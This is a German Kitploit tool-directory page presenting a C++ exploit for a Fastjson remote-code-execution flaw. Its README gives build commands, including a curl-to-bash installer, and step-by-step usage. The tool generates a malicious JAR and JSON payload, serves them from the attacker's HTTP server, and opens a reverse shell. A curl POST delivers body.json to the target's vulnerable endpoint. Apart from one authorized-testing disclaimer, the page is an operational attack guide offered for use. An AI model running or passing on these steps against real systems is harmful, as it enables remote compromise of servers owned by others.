Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2026-16723 — Exploit für Fastjson RCE (CVE-2026-16723), der auf die Versionen 1.2.68 bis 1.2.83 abzielt. Generiert JAR- und JSON-Payloads, hostet einen HTTP-Server und richtet eine Reverse Shell ein. | Kitploit
Tools/GitHubGitHub/nowafen/cve-2026-16723
Payload-GenerierungExploitationWebanwendungs-ExploitationPenetrationstestsRemote-Access-Tool
GitHubnowafen/cve-2026-16723

CVE-2026-16723

Exploit für Fastjson RCE (CVE-2026-16723), der auf die Versionen 1.2.68 bis 1.2.83 abzielt. Generiert JAR- und JSON-Payloads, hostet einen HTTP-Server und richtet eine Reverse Shell ein.

Repository anzeigen
2vor 4 TagenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2026-16723 Exploit

Eine eigenständige C++17-Implementierung für CVE-2026-16723, eine kritische Sicherheitslücke, die Fastjson-Versionen 1.2.68 – 1.2.83 betrifft.


Anforderungen

  • Linux (oder WSL unter Windows)

  • C++17-kompatibler Compiler (GCC 7+ oder Clang 5+)

  • CMake 3.10 oder neuer

  • Systempakete:

    • libzip-dev
    • zlib1g-dev

Debian / Ubuntu

root@kitploit:~
sudo apt update
sudo apt install -y build-essential cmake libzip-dev zlib1g-dev

Installation

Schnellinstallation (Empfohlen)

Alles mit einem einzigen Befehl installieren:

root@kitploit:~
curl -sSL https://raw.githubusercontent.com/yourusername/CVE-2026-16723/main/install.sh | bash

Oder laden Sie das Installationsskript manuell herunter und führen Sie es aus:

root@kitploit:~
wget https://raw.githubusercontent.com/yourusername/CVE-2026-16723/main/install.sh
chmod +x install.sh
./install.sh

Das Installationsskript übernimmt Folgendes:

  • Alle erforderlichen Systempakete installieren.

  • Die erforderlichen Header-only-Bibliotheken herunterladen:

    • nlohmann/json
    • cpp-httplib
  • Das Projekt kompilieren.

  • Die kompilierte Binärdatei im aktuellen Verzeichnis ablegen als:

root@kitploit:~
./exploit

Manueller Build

Wenn Sie das Repository geklont haben:

root@kitploit:~
git clone https://github.com/yourusername/CVE-2026-16723.git
cd CVE-2026-16723
./install.sh

Oder manuell kompilieren:

root@kitploit:~
mkdir build
cd build

cmake ..
make -j$(nproc)

cp exploit ../

Verwendung

Führen Sie die Binärdatei aus:

root@kitploit:~
./exploit --lhost <YOUR_IP> --lport <SHELL_PORT> [options]

Beispiel

root@kitploit:~
./exploit --lhost 192.168.1.100 --lport 4444 --http-port 8000

Nach der Ausführung werden die folgenden Dateien erstellt:

root@kitploit:~
x
body.json

Der HTTP-Server startet auf dem konfigurierten Port (Standard: 8000) und das Tool wartet auf eine eingehende Reverse-Shell-Verbindung.


Senden des Payloads

Senden Sie die generierte Datei body.json an den verwundbaren Endpunkt:

root@kitploit:~
curl -X POST http://<TARGET_IP>:8080/api/products/search \
     -H "Content-Type: application/json" \
     --data-binary @body.json

Falls die Anwendung ein anderes JSON-Feld erwartet, geben Sie es mit der Option --field an.


Befehlszeilenoptionen


Ausgabedateien

FileBeschreibung
xGenerierter JAR-Payload
body.jsonJSON-Payload zum Senden an das Ziel

Hinweise

  • Dieses Projekt ist ausschließlich für autorisierte Sicherheitstests und zu Bildungszwecken gedacht.
  • Die Implementierung zwingt die Zielanwendung, ein entferntes JAR über die Protokolle jar:http und jar:file herunterzuladen und zu laden.
  • Der Reverse-Shell-Befehl ist Base64-kodiert, um Probleme mit dem Escaping zu reduzieren.

Folgen Sie mir auf Twitter(X)

  • MNM
Tool herunterladen
OptionBeschreibungStandard
--lhostLokale IP-AdresseErforderlich
--lportListening-Port der Reverse-Shell4444
--http-portHTTP-Serverport8000
--firstErster zu testender Dateideskriptor3
--lastLetzter zu testender Dateideskriptor30
--fieldJSON-Feldnamefacets
--outdirAusgabeverzeichnis.
-h, --helpHilfemeldung anzeigen—